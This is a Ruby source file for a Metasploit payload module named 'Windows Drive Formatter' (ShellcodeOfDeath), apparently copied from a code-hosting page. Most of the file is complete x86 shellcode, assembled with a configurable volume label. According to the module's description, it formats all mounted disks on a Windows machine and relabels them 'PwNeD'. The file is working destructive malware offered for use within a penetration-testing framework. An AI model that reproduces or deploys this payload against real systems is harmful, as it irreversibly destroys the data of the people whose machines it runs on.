94 lines
3.9 KiB
Ruby
94 lines
3.9 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
###
|
|
# Shellcode Of Death
|
|
#
|
|
# Test bed:
|
|
# x86: Windows XP SP3, Windows 2003 SP2, Windows 7
|
|
# x64: Windows 8.1
|
|
#
|
|
###
|
|
|
|
require 'msf/core'
|
|
|
|
module MetasploitModule
|
|
|
|
CachedSize = 393
|
|
|
|
Rank = ManualRanking
|
|
|
|
include Msf::Payload::Windows
|
|
include Msf::Payload::Single
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Windows Drive Formatter',
|
|
'Description' => %q{
|
|
This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).
|
|
|
|
After formatting, this payload sets the volume label to the string specified in
|
|
the VOLUMELABEL option. If the code is unable to access a drive for any reason,
|
|
it skips the drive and proceeds to the next volume.
|
|
},
|
|
'Author' => [ 'Ashfaq Ansari <ashfaq_ansari1989[at]hotmail.com>',
|
|
'Ruei-Min Jiang <mike820324[at]gmail.com>'
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'URL', 'http://hacksys.vfreaks.com/research/shellcode-of-death.html' ],
|
|
[ 'URL', 'https://github.com/hacksysteam/ShellcodeOfDeath' ],
|
|
],
|
|
'Platform' => 'win',
|
|
'Arch' => ARCH_X86,
|
|
'Privileged' => true,
|
|
))
|
|
|
|
# EXITFUNC is not supported
|
|
deregister_options('EXITFUNC')
|
|
|
|
# Register command execution options
|
|
register_options(
|
|
[
|
|
OptString.new('VOLUMELABEL', [ false, "Set the volume label", "PwNeD" ])
|
|
], self.class)
|
|
end
|
|
|
|
def generate
|
|
|
|
volume_label = datastore['VOLUMELABEL'] || ""
|
|
encoded_volume_label = volume_label.to_s.unpack("C*").pack("v*")
|
|
|
|
# Calculate the magic key
|
|
magic_key = encoded_volume_label.length + 28
|
|
|
|
# Actual payload
|
|
payload_data = "\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0\xac\xc1\xc3\x05\x01\xc3\x83" +
|
|
"\xf8\x00\x75\xf3\xc1\xcb\x05\x39\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c" +
|
|
"\x8b\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3\xff\xff\xff\x5b\x8b\x4b" +
|
|
"\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83" +
|
|
"\x8d\x04\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40\x1c\x8b\x50\x08\x8b" +
|
|
"\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4" +
|
|
"\x34\x3b\x68\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68\xdc\xdd\x1a\x33" +
|
|
"\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89" +
|
|
"\xc2\x59\x51\x8b\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5\xeb\x0f\xe8" +
|
|
"\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf" +
|
|
"\x31\xd2\x52\x52\x6a\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3\x50\x83" +
|
|
"\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52\x52\x68\x20\x00\x09\x00\x50\x8b\x5d" +
|
|
"\x08\xff\xd3\xff\x74\x24\x04\x8b\x5d\x0c\xff\xd3\x8d\x86" +
|
|
# You need to adjust this. Logic: encoded_volume_label.length + 28
|
|
[magic_key].pack("C") +
|
|
"\x00\x00\x00\x50\x68\x00\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10\x00" +
|
|
"\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3\x68\xc8\x00\x00\x00\x8b\x5d\x04" +
|
|
"\xff\xd3\x89\xf9\x83\x46\x08\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff" +
|
|
"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00\x00\x4e\x00\x54\x00\x46\x00" +
|
|
"\x53\x00\x00\x00" +
|
|
# Volume Label, default: PwNeD
|
|
encoded_volume_label +
|
|
"\x00\x00\x55\x89\xe5\x31\xc0\x40\x5d\xc2\x0c\x00"
|
|
end
|
|
end
|